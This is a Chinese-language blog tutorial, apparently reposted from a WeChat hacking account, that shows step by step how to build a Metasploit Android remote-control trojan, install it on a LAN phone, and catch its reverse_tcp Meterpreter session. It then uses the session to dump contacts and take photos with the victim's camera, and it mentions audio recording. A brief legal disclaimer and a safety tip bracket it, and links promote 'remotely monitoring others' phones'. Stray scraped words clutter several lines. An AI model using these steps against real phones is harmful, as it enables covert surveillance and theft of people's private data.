滲透測試-教你用Kali入侵局域網手機

來源:https://blog.csdn.net/

前言

嚴正聲明:本文僅限於技術討論與分享,嚴禁用於非法途徑。android

本文目的:演示如何藉助Kali Linux系統的Metasploit滲透測試框架生成遠程控制木馬,而後感染局域網內的Android手機,從而實現對受害者手機數據的讀取、音頻的竊聽、位置的獲取、軟件安裝或卸載等。web

環境說明shell

機器 IP地址
Win10 物理主機 192.168.0.105
Kali 虛擬機 192.168.0.199
honor 8 測試手機 192.168.0.107

Win10主機和手機應鏈接同一個WIFI,Kali虛擬機安裝在VMware中,使用橋接模式使得可配置其IP地址跟物理主機、手機在同一個網段之中,造成一個小局域網。安全

攻擊準備微信

木馬生成

一、先說點廢話,來確認下 Kali 虛擬機配置好的IP地址:app

二、在 Kali 終端輸入如下命令在 Kali 虛擬機/root路徑下生成木馬文件520.apk框架

傳輸木馬

遠控木馬文件已經生成了,但如何從 Kali 虛擬機傳輸到 Win10 物理主機並進一步傳輸到受害者手機呢?tcp

一、使用Xshell遠程鏈接工具,新建以下SFTP協議的文件傳輸會話:
工具

二、同時配置好與遠程 Kali 主機對接的本地文件夾,用於 Win 10 主機傳輸文件的默認存放路徑:學習

三、輸入 kali 主機的帳戶和密碼進行登錄併成功鏈接後,使用命令get 520.apk從Kali 主機下載木馬文件到本地文件夾D:\Code

四、在 Win 10 主機本地文件夾確認下文件是否下載成功:

安裝木馬

一、再廢話一下,查看並確認華爲測試手機的IP地址與 Kali 虛擬機、Win 10主機在同一網段內:

二、在 Kali 虛擬機裏查看可否連通手機(這是後續攻擊成功的基礎):

三、在 Win 10 主機打開QQ程序,向華爲手機發送木馬文件並安裝(這個就不用演示了吧…),安裝後以下:

開始攻擊

MSF監聽

Kali 終端依次執行如下命令:

  
  
  
   
   
            
   
   
  • 1

  • 2

  • 3

  • 4

  • 5

  • 6

msfconsole //啓動msfconsole
use exploit/multi/handler //加載模塊
set payload android/meterpreter/reverse_tcp //選擇Payload
set lhost 192.168.0.199 //這裏的地址設置成咱們剛纔生成木馬的IP地址
set lport 9999 //這裏的端口設置成剛纔咱們生成木馬所監聽的端口
exploit //開始執行漏洞,開始監聽,等待手機上線

一、在 Kali 終端輸入msfconsole命令啓動Metasploit框架:

二、依次如下執行命令加載攻擊模塊、選擇Payload、設置本地監聽主機的IP和端口:

三、執行命令exploit開始執行攻擊程序,進入監聽狀態,等待目標手機上線(用戶點擊木馬程序):
四、此時手動點擊剛纔手機中安裝的MainActivity程序圖標(沒有界面),則可成功創建攻擊會話:

五、此時輸入help命令可查看具體的攻擊命令和描述,後面將選擇幾個進行演示:

命令行執行

成功創建攻擊會話後能夠對受害者手機進行像Linux主機shell同樣對手機進行命令執行操做:

通信錄下載

一、在攻擊會話中執行dump_contacts命令導出受害者手機通信錄裏的信息到 Kali 虛擬機/root路徑下:

二、在虛擬機中查看一下導出來的通信錄文件:

三、同理可導出受害者手機中的短信記錄、通話記錄……可是此手機沒有插手機卡(窮……),故此處不作演示了。

攝像機拍攝

在攻擊會話中執行命令webcam_snap ,可開啓受害者的攝像頭自動拍攝一張照片並保存到Kali 虛擬機中:

同理還能夠非法調用受害者手機的錄音功能、屏幕截圖功能……

至此,本次Kali系統生成遠控木馬後攻擊局域網內Android手機的演示結束,其餘攻擊操做讀者有興趣的話可自行藉助help命令給出的攻擊命令描述進行體驗。

舒適提醒這次演示中的木馬程序沒有圖形化界面的假裝,真實的環境中攻擊者會將其假裝得跟正常軟件同樣,這提醒了咱們不要輕易安裝安全性未知的軟件,同時不要輕易鏈接公共WIFI,讓本身的設備暴露在攻擊者搭建的局域網下……


學習更多黑客技能!體驗靶場實戰練習


黑客視頻資料及工具


往期內容回顧


滲透某賭博網站殺豬盤的經歷!

手把手教你如何遠程監聽他人手機

黑客網站大全!都在這了!速看被刪就沒了


本文分享自微信公衆號 - 暗網黑客(HackRead)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。

相關文章
相關標籤/搜索